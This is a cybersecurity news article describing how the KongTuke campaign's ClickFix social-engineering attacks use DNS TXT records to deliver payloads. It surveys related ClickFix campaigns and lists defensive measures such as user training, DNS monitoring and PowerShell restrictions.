Cybercriminals Exploit DNS TXT Records in Advanced ClickFix Attacks
In the ever-evolving landscape of cyber threats, the KongTuke campaign has emerged as a formidable adversary, continuously refining its tactics to circumvent traditional security measures. Since mid-2025, this group has been leveraging the ClickFix technique—a sophisticated social engineering method designed to deceive users into executing malicious code under the guise of resolving fictitious browser issues.
Understanding the ClickFix Technique
The ClickFix strategy capitalizes on user trust and the innate desire to troubleshoot perceived problems. Victims visiting compromised legitimate websites are confronted with fake browser errors or CAPTCHA verifications. These deceptive prompts instruct users to copy a provided script and paste it into their system’s Run dialog or PowerShell terminal. Unbeknownst to them, this action initiates the execution of malicious code, effectively turning the user into an unwitting accomplice in the attack.
Evolution: Incorporating DNS TXT Records
Recent analyses by cybersecurity experts have unveiled a significant advancement in the KongTuke campaign’s methodology. The attackers now employ DNS TXT records to stealthily deliver the next stage of their payload. This technique involves embedding malicious commands within DNS responses, thereby obfuscating the payload and complicating detection efforts.
Traditionally, the initial ClickFix script would reach out to a web server via HTTP to retrieve additional malicious code. However, by utilizing DNS TXT records, the attackers can bypass standard HTTP traffic monitoring. When the victim executes the initial script, it performs a DNS lookup for a specific TXT record associated with a seemingly legitimate domain. This record contains encoded commands that, once decoded, fetch and execute the final payload.
Implications of DNS-Based Payload Delivery
The use of DNS TXT records for payload delivery presents several challenges for cybersecurity defenses:
1. Evasion of Traditional Detection Mechanisms: DNS traffic is typically less scrutinized than HTTP traffic, allowing malicious commands embedded within DNS responses to evade detection.
2. Fileless Execution: By executing commands directly from memory without writing files to disk, the attackers minimize forensic artifacts, making post-infection analysis more difficult.
3. Persistence and Stealth: The final payloads often include remote access trojans (RATs) like Interlock, enabling persistent access and control over compromised systems while maintaining a low profile.
Broader Context: The Rise of ClickFix Attacks
The KongTuke campaign is not an isolated incident. Various threat actors have adopted and adapted the ClickFix technique to distribute a range of malware:
– SmartApeSG Campaign: This campaign evolved from using fake browser update pages to employing ClickFix-style techniques, tricking users into verifying their identity through fake CAPTCHA pages, leading to the deployment of NetSupport RAT. ([cybersecuritynews.com](https://cybersecuritynews.com/smartapesg-campaign-leverages-clickfix-technique/?utm_source=openai))
– LUMMAC.V2 Stealer: An evolution of the LUMMAC credential stealer, this variant uses ClickFix methods to deceive users into executing malicious commands, resulting in the exfiltration of sensitive information. ([cybersecuritynews.com](https://cybersecuritynews.com/new-lummac-v2-stealer-using-clickfix-technique/?utm_source=openai))
– CastleLoader Malware: This malware utilizes Cloudflare-themed ClickFix phishing pages to compromise Windows hosts, leading to the installation of information stealers and remote-access trojans. ([cybersecuritynews.com](https://cybersecuritynews.com/castleloader-attack-using-cloudflare-themed-clickfix-technique/?utm_source=openai))
– Kimsuky Hackers: The North Korean threat group Kimsuky has adopted the ClickFix technique to deceive users into executing malicious scripts, further highlighting the widespread adoption of this method. ([cybersecuritynews.com](https://cybersecuritynews.com/kimsuky-hackers-using-clickfix-technique/?utm_source=openai))
Mitigation Strategies
To defend against these sophisticated attacks, organizations and individuals should implement the following measures:
1. User Education: Train users to recognize and avoid deceptive prompts instructing them to execute scripts or commands, especially those presented as solutions to fabricated issues.
2. Monitor DNS Traffic: Implement monitoring solutions that can detect anomalous DNS queries and responses, particularly those involving TXT records.
3. Restrict PowerShell Execution: Apply policies that limit the execution of PowerShell scripts, especially those initiated by users without administrative privileges.
4. Regular Security Audits: Conduct periodic reviews of security configurations and logs to identify and address potential vulnerabilities or signs of compromise.
5. Update and Patch Systems: Ensure that all systems and software are up-to-date with the latest security patches to mitigate known vulnerabilities.
Conclusion
The KongTuke campaign’s integration of DNS TXT records into the ClickFix technique underscores the continuous evolution of cyber threats. By understanding these methods and implementing robust security practices, organizations can enhance their defenses against such sophisticated attacks.
